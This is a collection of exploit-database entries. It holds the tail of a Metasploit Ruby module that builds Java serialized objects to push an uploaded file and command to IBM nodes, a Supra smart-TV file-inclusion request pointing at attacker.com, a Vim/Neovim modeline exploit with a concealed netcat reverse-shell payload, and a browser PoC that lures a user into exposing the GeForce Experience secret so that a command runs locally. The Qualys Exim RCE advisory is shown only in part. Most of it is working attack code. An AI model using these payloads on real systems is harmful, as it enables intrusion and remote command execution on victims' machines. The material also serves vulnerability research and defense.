prng.rand(4294967295) # Create the field ref field_ref = Rex::Java::Serialization::Model::Reference.new field_ref.handle = Rex::Java::Serialization::BASE_WIRE_HANDLE + 1 msg_obj = build_message(obj, msg_id, msg_type, field_ref) # Create the integer field and add the reference id_field = Rex::Java::Serialization::Model::Field.new id_field.type = 'int' id_field.name = Rex::Java::Serialization::Model::Utf.new(nil, 'sourceMsgID') # Create the integer field and add the reference port_field = Rex::Java::Serialization::Model::Field.new port_field.type = 'int' port_field.name = Rex::Java::Serialization::Model::Utf.new(nil, 'sourceUdpPort') # Create the object field and add the reference ip_arr_field = Rex::Java::Serialization::Model::Field.new ip_arr_field.type = 'array' ip_arr_field.name = Rex::Java::Serialization::Model::Utf.new(nil, 'sourceIP') ip_arr_field.field_type = Rex::Java::Serialization::Model::Utf.new(nil, '[B') # Create the class description msg_class_desc = Rex::Java::Serialization::Model::NewClassDesc.new msg_class_desc.class_name = Rex::Java::Serialization::Model::Utf.new(nil, 'com.ibm.son.mesh.BcastFloodMsg') msg_class_desc.serial_version = 1 msg_class_desc.flags = 2 msg_class_desc.fields = [] msg_class_desc.fields << id_field msg_class_desc.fields << port_field msg_class_desc.fields << ip_arr_field # Add annotations msg_class_desc.class_annotation = Rex::Java::Serialization::Model::Annotation.new msg_class_desc.class_annotation.contents = [Rex::Java::Serialization::Model::EndBlockData.new] # Add superclass msg_class_desc.super_class = Rex::Java::Serialization::Model::ClassDesc.new msg_class_desc.super_class.description = msg_obj # Construct IP Array ip_arr = source_ip.split(".").map(&:to_i) builder = Rex::Java::Serialization::Builder.new values_array = builder.new_array( values_type: 'byte', values: ip_arr, name: '[B', serial: 0x42acf317f8060854e0, annotations: [Rex::Java::Serialization::Model::EndBlockData.new] ) # Set the member values obj.class_data << 
# Tail of build_bcast_flood_msg (the three class_data values, returns the class desc), then
# build_tcp_node_msg(obj, msg_type, source_ip, source_port, p2p_obj): builds the NewClassDesc
# for 'com.ibm.son.mesh.TcpNodeMessage' (serialVersionUID 1, flags 2) with fields
# bootTime(long), tcpPort(int), udpPort(int), ip([B) and
# nodeProperty(Lcom/ibm/son/mesh/AppLevelNodeProperty;), chained under the message class
# desc returned by build_message (here the 4th argument is the Utf type Ljava/lang/String;
# for origCell). Returns the class desc; the member values are appended to obj.class_data
# as a side effect.
['int', msg_id] obj.class_data << ['int', source_port] obj.class_data << values_array msg_class_desc end def build_tcp_node_msg(obj, msg_type, source_ip, source_port, p2p_obj) prng = Random.new msg_id = prng.rand(4294967295) # Create the field type for the origCell field_type = Rex::Java::Serialization::Model::Utf.new(nil, "Ljava/lang/String;") msg_obj = build_message(obj, msg_id, msg_type, field_type) # Create the port field and add the reference boot_time_field = Rex::Java::Serialization::Model::Field.new boot_time_field.type = 'long' boot_time_field.name = Rex::Java::Serialization::Model::Utf.new(nil, 'bootTime') # Create the port field and add the reference tcp_port_field = Rex::Java::Serialization::Model::Field.new tcp_port_field.type = 'int' tcp_port_field.name = Rex::Java::Serialization::Model::Utf.new(nil, 'tcpPort') # Create the port field and add the reference udp_port_field = Rex::Java::Serialization::Model::Field.new udp_port_field.type = 'int' udp_port_field.name = Rex::Java::Serialization::Model::Utf.new(nil, 'udpPort') # Create the object field and add the reference ip_arr_field = Rex::Java::Serialization::Model::Field.new ip_arr_field.type = 'array' ip_arr_field.name = Rex::Java::Serialization::Model::Utf.new(nil, 'ip') ip_arr_field.field_type = Rex::Java::Serialization::Model::Utf.new(nil, '[B') # Create the task object field and add field_type node_prop_field = Rex::Java::Serialization::Model::Field.new node_prop_field.type = 'object' node_prop_field.name = Rex::Java::Serialization::Model::Utf.new(nil, 'nodeProperty') node_prop_field.field_type = Rex::Java::Serialization::Model::Utf.new(nil, "Lcom/ibm/son/mesh/AppLevelNodeProperty;") # Create the class description msg_class_desc = Rex::Java::Serialization::Model::NewClassDesc.new msg_class_desc.class_name = Rex::Java::Serialization::Model::Utf.new(nil, 'com.ibm.son.mesh.TcpNodeMessage') msg_class_desc.serial_version = 1 msg_class_desc.flags = 2 msg_class_desc.fields = [] msg_class_desc.fields << 
# Tail of build_tcp_node_msg: field list, annotation, superclass link, IP byte array, then
# class_data = [long 0 (bootTime), int source_port (tcpPort), int source_port (udpPort),
# byte[] ip, p2p_obj]; note that source_port is reused for both tcpPort and udpPort.
# build_app_node_class(obj): NewClassDesc for 'com.ibm.son.mesh.AppLevelNodeProperty'
# (serialVersionUID 1, flags 2) with fields structuredGateway(boolean), version(int),
# bridgedCellsList(Ljava/util/List;) and cellName, whose type is a back-reference to wire
# handle BASE_WIRE_HANDLE + 4 rather than an inline Utf.
boot_time_field msg_class_desc.fields << tcp_port_field msg_class_desc.fields << udp_port_field msg_class_desc.fields << ip_arr_field msg_class_desc.fields << node_prop_field # Add annotations msg_class_desc.class_annotation = Rex::Java::Serialization::Model::Annotation.new msg_class_desc.class_annotation.contents = [Rex::Java::Serialization::Model::EndBlockData.new] # Add superclass msg_class_desc.super_class = Rex::Java::Serialization::Model::ClassDesc.new msg_class_desc.super_class.description = msg_obj # Construct IP Array ip_arr = source_ip.split(".").map(&:to_i) builder = Rex::Java::Serialization::Builder.new values_array = builder.new_array( values_type: 'byte', values: ip_arr, name: '[B', serial: 0x42acf317f8060854e0, annotations: [Rex::Java::Serialization::Model::EndBlockData.new] ) # Set the member values obj.class_data << ['long', 0] obj.class_data << ['int', source_port] obj.class_data << ['int', source_port] obj.class_data << values_array obj.class_data << p2p_obj msg_class_desc end def build_app_node_class(obj) # Create the structured gateway field and add the reference struct_bool_field = Rex::Java::Serialization::Model::Field.new struct_bool_field.type = 'boolean' struct_bool_field.name = Rex::Java::Serialization::Model::Utf.new(nil, 'structuredGateway') # Create the version field and add the reference version_field = Rex::Java::Serialization::Model::Field.new version_field.type = 'int' version_field.name = Rex::Java::Serialization::Model::Utf.new(nil, 'version') # Create the object field and add the reference bridge_field = Rex::Java::Serialization::Model::Field.new bridge_field.type = 'object' bridge_field.name = Rex::Java::Serialization::Model::Utf.new(nil, 'bridgedCellsList') bridge_field.field_type = Rex::Java::Serialization::Model::Utf.new(nil, 'Ljava/util/List;') # Create the field ref field_ref = Rex::Java::Serialization::Model::Reference.new field_ref.handle = Rex::Java::Serialization::BASE_WIRE_HANDLE + 4 # Create the cellname field and 
# Tail of build_app_node_class: no superclass (NullReference); class_data = [boolean 0,
# int 0, null bridgedCellsList, cellName = random decimal string].
# build_hashtable_class(obj): NewClassDesc for 'java.util.Hashtable' with the JDK's
# serialVersionUID 0x13BB0F25214AE4B8 and flags 3 (SC_WRITE_METHOD | SC_SERIALIZABLE, i.e.
# custom writeObject data follows the fields), fields loadFactor(float), threshold(int).
add the reference cellname_field = Rex::Java::Serialization::Model::Field.new cellname_field.type = 'object' cellname_field.name = Rex::Java::Serialization::Model::Utf.new(nil, 'cellName') cellname_field.field_type = field_ref # Create the class description msg_class_desc = Rex::Java::Serialization::Model::NewClassDesc.new msg_class_desc.class_name = Rex::Java::Serialization::Model::Utf.new(nil, 'com.ibm.son.mesh.AppLevelNodeProperty') msg_class_desc.serial_version = 1 msg_class_desc.flags = 2 msg_class_desc.fields = [] msg_class_desc.fields << struct_bool_field msg_class_desc.fields << version_field msg_class_desc.fields << bridge_field msg_class_desc.fields << cellname_field # Add annotations msg_class_desc.class_annotation = Rex::Java::Serialization::Model::Annotation.new msg_class_desc.class_annotation.contents = [Rex::Java::Serialization::Model::EndBlockData.new] # Add superclass msg_class_desc.super_class = Rex::Java::Serialization::Model::ClassDesc.new msg_class_desc.super_class.description = Rex::Java::Serialization::Model::NullReference.new # Set the member values obj.class_data << ['boolean', 0] obj.class_data << ['int', 0] obj.class_data << Rex::Java::Serialization::Model::NullReference.new obj.class_data << Rex::Java::Serialization::Model::Utf.new(nil, rand(0xffffffffffff).to_s) # Cell Name msg_class_desc end def build_hashtable_class(obj) # Create the integer field and add the reference load_field = Rex::Java::Serialization::Model::Field.new load_field.type = 'float' load_field.name = Rex::Java::Serialization::Model::Utf.new(nil, 'loadFactor') # Create the integer field and add the reference threshold_field = Rex::Java::Serialization::Model::Field.new threshold_field.type = 'int' threshold_field.name = Rex::Java::Serialization::Model::Utf.new(nil, 'threshold') # Create the class description msg_class_desc = Rex::Java::Serialization::Model::NewClassDesc.new msg_class_desc.class_name = Rex::Java::Serialization::Model::Utf.new(nil, 'java.util.Hashtable') 
# Tail of build_hashtable_class: loadFactor 0.75, threshold 8, then an 8-byte BlockData
# (two big-endian ints, 11 and 3) standing in for Hashtable.writeObject's output;
# presumably capacity and element count, matching the three key/value pairs written by
# build_properties_class below (verify against the JDK's Hashtable.writeObject).
# build_properties_class: builds a complete NewObject for 'java.util.Properties' (JDK
# serialVersionUID 0x3912D07A70363E98, flags 2) whose single field 'defaults' is typed by a
# back-reference to BASE_WIRE_HANDLE + 9, with the Hashtable class desc as its superclass.
msg_class_desc.serial_version = 0x13BB0F25214AE4B8 msg_class_desc.flags = 3 msg_class_desc.fields = [] msg_class_desc.fields << load_field msg_class_desc.fields << threshold_field # Add annotations msg_class_desc.class_annotation = Rex::Java::Serialization::Model::Annotation.new msg_class_desc.class_annotation.contents = [Rex::Java::Serialization::Model::EndBlockData.new] # Add superclass msg_class_desc.super_class = Rex::Java::Serialization::Model::ClassDesc.new msg_class_desc.super_class.description = Rex::Java::Serialization::Model::NullReference.new obj.class_data << ['float', 0.75] obj.class_data << ['int', 8] obj.class_data << Rex::Java::Serialization::Model::BlockData.new(nil, "\x00\x00\x00\x0b\x00\x00\x00\x03") msg_class_desc end def build_properties_class # Create the object object = Rex::Java::Serialization::Model::NewObject.new object.class_desc = Rex::Java::Serialization::Model::ClassDesc.new msg_obj = build_hashtable_class(object) # Create the field ref field_ref = Rex::Java::Serialization::Model::Reference.new field_ref.handle = Rex::Java::Serialization::BASE_WIRE_HANDLE + 9 # Create the integer field and add the reference defaults_field = Rex::Java::Serialization::Model::Field.new defaults_field.type = 'object' defaults_field.name = Rex::Java::Serialization::Model::Utf.new(nil, 'defaults') defaults_field.field_type = field_ref # Create the class description msg_class_desc = Rex::Java::Serialization::Model::NewClassDesc.new msg_class_desc.class_name = Rex::Java::Serialization::Model::Utf.new(nil, 'java.util.Properties') msg_class_desc.serial_version = 0x3912D07A70363E98 msg_class_desc.flags = 2 msg_class_desc.fields = [] msg_class_desc.fields << defaults_field # Add annotations msg_class_desc.class_annotation = Rex::Java::Serialization::Model::Annotation.new msg_class_desc.class_annotation.contents = [Rex::Java::Serialization::Model::EndBlockData.new] # Add superclass msg_class_desc.super_class = Rex::Java::Serialization::Model::ClassDesc.new 
# Tail of build_properties_class: class_data = three Utf key/value pairs,
# memberName=<random decimal>, inOdc='0', epoch=<current time in ms>; returns the NewObject.
# build_p2p_node_class(obj): NewClassDesc for 'com.ibm.ws.wsgroup.p2p.P2PShimNodeProperty'
# (serialVersionUID 2, flags 2) with fields data (array, typed by back-reference
# BASE_WIRE_HANDLE + 1) and properties(Ljava/util/Properties;), chained under the
# AppLevelNodeProperty desc from build_app_node_class.
msg_class_desc.super_class.description = msg_obj # Set the member values object.class_desc.description = msg_class_desc object.class_data << Rex::Java::Serialization::Model::Utf.new(nil, 'memberName') object.class_data << Rex::Java::Serialization::Model::Utf.new(nil, rand(0xffffffffffff).to_s) # Cell Name object.class_data << Rex::Java::Serialization::Model::Utf.new(nil, 'inOdc') object.class_data << Rex::Java::Serialization::Model::Utf.new(nil, '0') object.class_data << Rex::Java::Serialization::Model::Utf.new(nil, 'epoch') object.class_data << Rex::Java::Serialization::Model::Utf.new(nil, (Time.now.to_f * 1000).to_i.to_s) object end def build_p2p_node_class(obj) msg_obj = build_app_node_class(obj) # Create the field ref field_ref = Rex::Java::Serialization::Model::Reference.new field_ref.handle = Rex::Java::Serialization::BASE_WIRE_HANDLE + 1 # Create the data field and add the reference data_field = Rex::Java::Serialization::Model::Field.new data_field.type = 'array' data_field.name = Rex::Java::Serialization::Model::Utf.new(nil, 'data') data_field.field_type = field_ref # Create the object field and add the reference prop_field = Rex::Java::Serialization::Model::Field.new prop_field.type = 'object' prop_field.name = Rex::Java::Serialization::Model::Utf.new(nil, 'properties') prop_field.field_type = Rex::Java::Serialization::Model::Utf.new(nil, 'Ljava/util/Properties;') # Create the class description msg_class_desc = Rex::Java::Serialization::Model::NewClassDesc.new msg_class_desc.class_name = Rex::Java::Serialization::Model::Utf.new(nil, 'com.ibm.ws.wsgroup.p2p.P2PShimNodeProperty') msg_class_desc.serial_version = 2 msg_class_desc.flags = 2 msg_class_desc.fields = [] msg_class_desc.fields << data_field msg_class_desc.fields << prop_field # Add annotations msg_class_desc.class_annotation = Rex::Java::Serialization::Model::Annotation.new msg_class_desc.class_annotation.contents = [Rex::Java::Serialization::Model::EndBlockData.new] # Add superclass 
# Tail of build_p2p_node_class: 'data' is an empty byte[] whose array class desc is a
# back-reference to BASE_WIRE_HANDLE + 6; 'properties' is the Properties object from
# build_properties_class.
# build_upfile_arg_class(filename, bytes, cmd): builds a complete NewObject for
# 'com.ibm.son.plugin.UploadFileArgument' (serialVersionUID 1, flags 2): fileBody = bytes
# (byte[] via back-reference BASE_WIRE_HANDLE + 7), fileName = filename, postProcCmd = cmd.
# All three field types are back-references (+1, +4, +1), so this object depends on the
# handle numbering of the surrounding stream rather than standing alone.
msg_class_desc.super_class = Rex::Java::Serialization::Model::ClassDesc.new msg_class_desc.super_class.description = msg_obj # Create the byte array ref field_ref = Rex::Java::Serialization::Model::Reference.new field_ref.handle = Rex::Java::Serialization::BASE_WIRE_HANDLE + 6 # Construct IP Array byte_array = Rex::Java::Serialization::Model::NewArray.new byte_array.array_description = Rex::Java::Serialization::Model::ClassDesc.new byte_array.array_description.description = field_ref byte_array.type = "byte" byte_array.values = [] # Set the member values obj.class_data << byte_array # Add properties obj.class_data << build_properties_class msg_class_desc end def build_upfile_arg_class(filename, bytes, cmd) # Create the field ref field_ref = Rex::Java::Serialization::Model::Reference.new field_ref.handle = Rex::Java::Serialization::BASE_WIRE_HANDLE + 1 # Create the integer field and add the reference filename_field = Rex::Java::Serialization::Model::Field.new filename_field.type = 'object' filename_field.name = Rex::Java::Serialization::Model::Utf.new(nil, 'fileName') filename_field.field_type = field_ref # Create the field ref field_ref = Rex::Java::Serialization::Model::Reference.new field_ref.handle = Rex::Java::Serialization::BASE_WIRE_HANDLE + 4 # Create the integer field and add the reference filebody_field = Rex::Java::Serialization::Model::Field.new filebody_field.type = 'array' filebody_field.name = Rex::Java::Serialization::Model::Utf.new(nil, 'fileBody') filebody_field.field_type = field_ref # Create the field ref field_ref = Rex::Java::Serialization::Model::Reference.new field_ref.handle = Rex::Java::Serialization::BASE_WIRE_HANDLE + 1 # Create the object field and add the reference post_cmd_field = Rex::Java::Serialization::Model::Field.new post_cmd_field.type = 'object' post_cmd_field.name = Rex::Java::Serialization::Model::Utf.new(nil, 'postProcCmd') post_cmd_field.field_type = field_ref # Create the class description msg_class_desc = 
# Tail of build_upfile_arg_class: the field order written is fileBody, fileName,
# postProcCmd (not the order the locals were declared in); values are appended in that order.
# build_bcast_run_task_msg(obj, msg_type, source_ip, source_port, upfile_arg_obj):
# NewClassDesc for 'com.ibm.son.plugin.BcastMsgRunTask' (serialVersionUID 1, flags 2)
# chained under the BcastFloodMsg desc from build_bcast_flood_msg, with fields
# forwardGatheredDataPipelinePeriod(int), outputGatherInterval(int), task(Ljava/lang/String;)
# and taskArgument(Ljava/io/Serializable;).
Rex::Java::Serialization::Model::NewClassDesc.new msg_class_desc.class_name = Rex::Java::Serialization::Model::Utf.new(nil, 'com.ibm.son.plugin.UploadFileArgument') msg_class_desc.serial_version = 1 msg_class_desc.flags = 2 msg_class_desc.fields = [] msg_class_desc.fields << filebody_field msg_class_desc.fields << filename_field msg_class_desc.fields << post_cmd_field # Add annotations msg_class_desc.class_annotation = Rex::Java::Serialization::Model::Annotation.new msg_class_desc.class_annotation.contents = [Rex::Java::Serialization::Model::EndBlockData.new] # Add superclass msg_class_desc.super_class = Rex::Java::Serialization::Model::ClassDesc.new msg_class_desc.super_class.description = Rex::Java::Serialization::Model::NullReference.new # Create the byte array ref field_ref = Rex::Java::Serialization::Model::Reference.new field_ref.handle = Rex::Java::Serialization::BASE_WIRE_HANDLE + 7 # Construct IP Array byte_array = Rex::Java::Serialization::Model::NewArray.new byte_array.array_description = Rex::Java::Serialization::Model::ClassDesc.new byte_array.array_description.description = field_ref byte_array.type = "byte" byte_array.values = bytes # Set the member values object = Rex::Java::Serialization::Model::NewObject.new object.class_desc = Rex::Java::Serialization::Model::ClassDesc.new object.class_desc.description = msg_class_desc object.class_data << byte_array object.class_data << Rex::Java::Serialization::Model::Utf.new(nil, filename) object.class_data << Rex::Java::Serialization::Model::Utf.new(nil, cmd) object end def build_bcast_run_task_msg(obj, msg_type, source_ip, source_port, upfile_arg_obj) msg_obj = build_bcast_flood_msg(obj, msg_type, source_ip, source_port) # Create the integer field and add the reference out_int_field = Rex::Java::Serialization::Model::Field.new out_int_field.type = 'int' out_int_field.name = Rex::Java::Serialization::Model::Utf.new(nil, 'outputGatherInterval') # Create the task object field and add field_type task_field = 
# Tail of build_bcast_run_task_msg: class_data = [int 0 (forwardGatheredDataPipelinePeriod),
# int 1 (outputGatherInterval), task='com.ibm.son.plugin.UploadFileToAllNodes',
# taskArgument=upfile_arg_obj]; returns the class desc. The final 'end' closes the
# enclosing module/class, whose header is outside this excerpt.
# Defender note: the hard-coded class names (com.ibm.son.mesh.*, com.ibm.son.plugin.*,
# com.ibm.ws.wsgroup.p2p.*) and the UploadFileToAllNodes task string are the identifiers
# to watch for in inbound serialized-object traffic and to consider in deserialization
# filter / allowlist decisions on the affected product.
Rex::Java::Serialization::Model::Field.new task_field.type = 'object' task_field.name = Rex::Java::Serialization::Model::Utf.new(nil, 'task') task_field.field_type = Rex::Java::Serialization::Model::Utf.new(nil, "Ljava/lang/String;") # Create the task object field and add field_type task_arg_field = Rex::Java::Serialization::Model::Field.new task_arg_field.type = 'object' task_arg_field.name = Rex::Java::Serialization::Model::Utf.new(nil, 'taskArgument') task_arg_field.field_type = Rex::Java::Serialization::Model::Utf.new(nil, "Ljava/io/Serializable;") # Create the integer field and add the reference forward_gather_field = Rex::Java::Serialization::Model::Field.new forward_gather_field.type = 'int' forward_gather_field.name = Rex::Java::Serialization::Model::Utf.new(nil, 'forwardGatheredDataPipelinePeriod') # Create the class description msg_class_desc = Rex::Java::Serialization::Model::NewClassDesc.new msg_class_desc.class_name = Rex::Java::Serialization::Model::Utf.new(nil, 'com.ibm.son.plugin.BcastMsgRunTask') msg_class_desc.serial_version = 1 msg_class_desc.flags = 2 msg_class_desc.fields = [] msg_class_desc.fields << forward_gather_field msg_class_desc.fields << out_int_field msg_class_desc.fields << task_field msg_class_desc.fields << task_arg_field # Add annotations msg_class_desc.class_annotation = Rex::Java::Serialization::Model::Annotation.new msg_class_desc.class_annotation.contents = [Rex::Java::Serialization::Model::EndBlockData.new] # Add superclass msg_class_desc.super_class = Rex::Java::Serialization::Model::ClassDesc.new msg_class_desc.super_class.description = msg_obj # Set the member values obj.class_data << ['int', 0] obj.class_data << ['int', 1] obj.class_data << Rex::Java::Serialization::Model::Utf.new(nil, 'com.ibm.son.plugin.UploadFileToAllNodes') obj.class_data << upfile_arg_obj msg_class_desc end end
-
Supra Smart Cloud TV - 'openLiveURL()' Remote File Inclusion
Exploit Title: Remote file inclusion # Date: 03-06-2019 # Exploit Author: Dhiraj Mishra # Vendor Homepage: https://supra.ru # Software Link: https://supra.ru/catalog/televizory/televizor_supra_stv_lc40lt0020f/ # CVE: CVE-2019-12477 # References: # https://nvd.nist.gov/vuln/detail/CVE-2019-12477 # https://www.inputzero.io/2019/06/hacking-smart-tv.html Summary: Supra Smart Cloud TV allows remote file inclusion in the openLiveURL function, which allows a local attacker to broadcast fake video without any authentication via a /remote/media_control?action=setUri&uri=URI Technical Observation: We are abusing `openLiveURL()` which allows a local attacker to broadcast video on supra smart cloud TV. I found this vulnerability initially by source code review; crawling the application and reading every request then helped me trigger it. Vulnerable code: function openLiveTV(url) { $.get("/remote/media_control", {m_action:'setUri',m_uri:url,m_type:'video/*'}, function (data, textStatus){ if("success"==textStatus){ alert(textStatus); }else { alert(textStatus); } }); } Vulnerable request: GET /remote/media_control?action=setUri&uri= http://attacker.com/fake_broadcast_message.m3u8 HTTP/1.1 Host: 192.168.1.155 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:66.0) Gecko/20100101 Firefox/66.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: close Upgrade-Insecure-Requests: 1 To trigger the vulnerability you can send a crafted request to the URL, http://192.168.1.155/remote/media_control?action=setUri&uri=http://attacker.com/fake_broadcast_message.m3u8 Although the above-mentioned URL expects (.m3u8) format video. We can use `curl -v -X GET` to send such a request; typically this is an unauthenticated remote file inclusion. 
An attacker could broadcast any video without any authentication; in the worst case, an attacker could leverage this vulnerability to broadcast a fake emergency message.
-
Vim < 8.1.1365 / Neovim < 0.3.6 - Arbitrary Code Execution
*by Arminius ([@rawsec](https://twitter.com/rawsec))* Vim/Neovim Arbitrary Code Execution via Modelines ================================================= ``` Product: Vim < 8.1.1365, Neovim < 0.3.6 Type: Arbitrary Code Execution CVE: CVE-2019-12735 Date: 2019-06-04 Author: Arminius (@rawsec) ``` Summary ------- Vim before 8.1.1365 and Neovim before 0.3.6 are vulnerable to arbitrary code execution via modelines by opening a specially crafted text file. Proof of concept ---------------- - Create [`poc.txt`](../data/2019-06-04_ace-vim-neovim/poc.txt): :!uname -a||" vi:fen:fdm=expr:fde=assert_fails("source\!\ \%"):fdl=0:fdt=" - Ensure that the modeline option has not been disabled (`:set modeline`). - Open the file in Vim: $ vim poc.txt - The system will execute `uname -a`. Proof of concept 2 (reverse shell) ---------------------------------- This PoC outlines a real-life attack approach in which a reverse shell is launched once the user opens the file. To conceal the attack, the file will be immediately rewritten when opened. Also, the PoC uses terminal escape sequences to hide the modeline when the content is printed with `cat`. (`cat -v` reveals the actual content.) [`shell.txt`](../data/2019-06-04_ace-vim-neovim/shell.txt): \x1b[?7l\x1bSNothing here.\x1b:silent! w | call system(\'nohup nc 127.0.0.1 9999 -e /bin/sh &\') | redraw! | file | silent! # " vim: set fen fdm=expr fde=assert_fails(\'set\\ fde=x\\ \\|\\ source\\!\\ \\%\') fdl=0: \x16\x1b[1G\x16\x1b[KNothing here."\x16\x1b[D \n Demo (victim left, attacker right):  Details ------- The modeline feature allows to specify custom editor options near the start or end of a file. This feature is enabled by default and applied to all file types, including plain `.txt`. 
A typical modeline: /* vim: set textwidth=80 tabstop=8: */ For security reasons, only a subset of options is permitted in modelines, and if the option value contains an expression, it is executed in a sandbox: [[1]] No other commands than "set" are supported, for security reasons (somebody might create a Trojan horse text file with modelines). And not all options can be set. For some options a flag is set, so that when it's used the |sandbox| is effective. The sandbox is meant to prevent side effects: [[2]] The 'foldexpr', 'formatexpr', 'includeexpr', 'indentexpr', 'statusline' and 'foldtext' options may be evaluated in a sandbox. This means that you are protected from these expressions having nasty side effects. This gives some safety for when these options are set from a modeline. However, the `:source!` command (with the bang [`!`] modifier) can be used to bypass the sandbox. It reads and executes commands from a given file as if *typed manually*, running them after the sandbox has been left. [[3]] :so[urce]! {file} Read Vim commands from {file}. These are commands that are executed from Normal mode, like you type them. Thus, one can trivially construct a modeline that runs code outside the sandbox: # vim: set foldexpr=execute('\:source! some_file'): An additional step is needed for Neovim which blacklists `execute()`: [[4]] execute({command} [, {silent}]) *execute()* Execute {command} and capture its output. [...] This function is not available in the |sandbox|. Here, `assert_fails()` can be used instead, which takes a `{cmd}` argument, too: [[5]] assert_fails({cmd} [, {error} [, {msg}]]) *assert_fails()* Run {cmd} and add an error message to |v:errors| if it does NOT produce an error. The following modeline utilizes a fold expression to run `source! 
%` to execute the current file, which in turn executes `uname -a || "(garbage)"` as a shell command: :!uname -a||" vi:fen:fdm=expr:fde=assert_fails("source\!\ \%"):fdl=0:fdt=" Additionally, the Neovim-only function `nvim_input()` is vulnerable to the same approach via e.g.: vi:fen:fdm=expr:fde=nvim_input("\:terminal\ uname\ -a"):fdl=0 (In the past, other modeline-related vulnerabilities have been patched in Vim - see [CVE-2002-1377](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1377), [CVE-2016-1248](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-1248).) Patches ------- - [Vim patch 8.1.1365](https://github.com/vim/vim/commit/5357552) - [Neovim patch](https://github.com/neovim/neovim/pull/10082) (released in [v0.3.6](https://github.com/neovim/neovim/releases/tag/v0.3.6)) Beyond patching, it's recommended to disable modelines in the vimrc (`set nomodeline`), to use the [securemodelines](https://github.com/ciaranm/securemodelines/) plugin, or to disable `modelineexpr` (since patch 8.1.1366, Vim-only) to disallow expressions in modelines. Timeline -------- - 2019-05-22 Vim and Neovim maintainers notified - 2019-05-23 Vim patch released - 2019-05-29 Neovim patch released - 2019-06-05 CVE ID CVE-2019-12735 assigned Also see description of [CVE-2019-12735](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12735). 
[1]: https://github.com/vim/vim/blob/5c017b2de28d19dfa4af58b8973e32f31bb1477e/runtime/doc/options.txt#L582 [2]: https://github.com/vim/vim/blob/5c017b2de28d19dfa4af58b8973e32f31bb1477e/runtime/doc/eval.txt#L13050 [3]: https://github.com/vim/vim/blob/5c017b2de28d19dfa4af58b8973e32f31bb1477e/runtime/doc/repeat.txt#L182 [4]: https://github.com/neovim/neovim/blob/1060bfd0338253107deaac346e362a9feab32068/runtime/doc/eval.txt#L3247 [5]: https://github.com/neovim/neovim/blob/1060bfd0338253107deaac346e362a9feab32068/runtime/doc/eval.txt#L2494 [6]: https://github.com/vim/vim/releases/tag/v8.1.1365 [7]: https://github.com/neovim/neovim/releases/tag/v0.3.6
-
Nvidia GeForce Experience Web Helper - Command Injection
<!-- Review notes: submitRequest(port, secret) POSTs to the local GFE helper at
     http://127.0.0.1:<port>/gfeupdate/autoGFEInstall/ with the X_LOCAL_SECURITY_COOKIE header
     set to the secret; port and secret are parsed from the JSON file the user is led to pick.
     The hidden #myInput holds the path %LOCALAPPDATA%\NVIDIA Corporation\NvNode\nodejs.json,
     which the Ctrl (keyCode 17) keydown copies to the clipboard while also clicking the hidden
     file input, hence the "Press CTRL+V+Enter" prompt. The request body is the double-quoted
     value of the hidden #cmd input. The inline onchange="file_changed(this)" names a function
     this page never defines (a console ReferenceError); the jQuery
     .on('change', '.file-upload-button') handler is what actually fires.
     Defender takeaway: the helper's only gate is a secret kept in a user-readable file, so a
     page that can get the browser to read that file can drive the endpoint; apply the vendor
     fix, and a browser-originated POST to the autoGFEInstall endpoint is a plausible
     detection signal. -->
<!-- POC for CVE‑2019‑5678 Nvidia GeForce Experience OS command injection via a web browser Author: David Yesland -- Rhino Security Labs --> <html> <head> <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.3.1/jquery.min.js"></script> </head> <body> <script> //Send request to local GFE server function submitRequest(port,secret) { var xhr = new XMLHttpRequest(); xhr.open("POST", "http:\/\/127.0.0.1:"+port+"\/gfeupdate\/autoGFEInstall\/", true); xhr.setRequestHeader("Accept", "text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8"); xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5"); xhr.setRequestHeader("Content-Type", "text\/html"); xhr.setRequestHeader("X_LOCAL_SECURITY_COOKIE", secret); var body = "\""+document.getElementById("cmd").value+"\""; var aBody = new Uint8Array(body.length); for (var i = 0; i < aBody.length; i++) aBody[i] = body.charCodeAt(i); xhr.send(new Blob([aBody])); } $(document).on('change', '.file-upload-button', function(event) { var reader = new FileReader(); reader.onload = function(event) { var jsonObj = JSON.parse(event.target.result); submitRequest(jsonObj.port,jsonObj.secret); } reader.readAsText(event.target.files[0]); }); //Copy text from some text field function myFunction() { var copyText = document.getElementById("myInput"); copyText.select(); document.execCommand("copy"); } //trigger the copy and file window on ctrl press $(document).keydown(function(keyPressed) { if (keyPressed.keyCode == 17) { myFunction();document.getElementById('file-input').click(); } }); </script> <h2> Press CTRL+V+Enter </h2> <!--Command to run in a hidden input field--> <input type="hidden" value="calc.exe" id="cmd" size="55"> <!--Hidden text box to copy text from--> <div style="opacity: 0.0;"> <input type="text" value="%LOCALAPPDATA%\NVIDIA Corporation\NvNode\nodejs.json" id="myInput" size="1"> </div> <!--file input--> <input id="file-input" onchange="file_changed(this)" onclick="this.value=null;" accept="application/json" 
class='file-upload-button' type="file" name="name" style="display: none;" /> </body> </html>
-
Exim 4.87 < 4.91 - (Local / Remote) Command Execution
Qualys Security Advisory The Return of the WIZard: RCE in Exim (CVE-2019-10149) ======================================================================== Contents ======================================================================== Summary Local exploitation Remote exploitation - Non-default configurations - Default configuration Acknowledgments Timeline Boromir: "What is this new devilry?" Gandalf: "A Balrog. A demon of the Ancient World." -- The Lord of the Rings: The Fellowship of the Ring ======================================================================== Summary ======================================================================== During a code review of the latest changes in the Exim mail server (https://en.wikipedia.org/wiki/Exim), we discovered an RCE vulnerability in versions 4.87 to 4.91 (inclusive). In this particular case, RCE means Remote *Command* Execution, not Remote Code Execution: an attacker can execute arbitrary commands with execv(), as root; no memory corruption or ROP (Return-Oriented Programming) is involved. This vulnerability is exploitable instantly by a local attacker (and by a remote attacker in certain non-default configurations). To remotely exploit this vulnerability in the default configuration, an attacker must keep a connection to the vulnerable server open for 7 days (by transmitting one byte every few minutes). However, because of the extreme complexity of Exim's code, we cannot guarantee that this exploitation method is unique; faster methods may exist. Exim is vulnerable by default since version 4.87 (released on April 6, 2016), when #ifdef 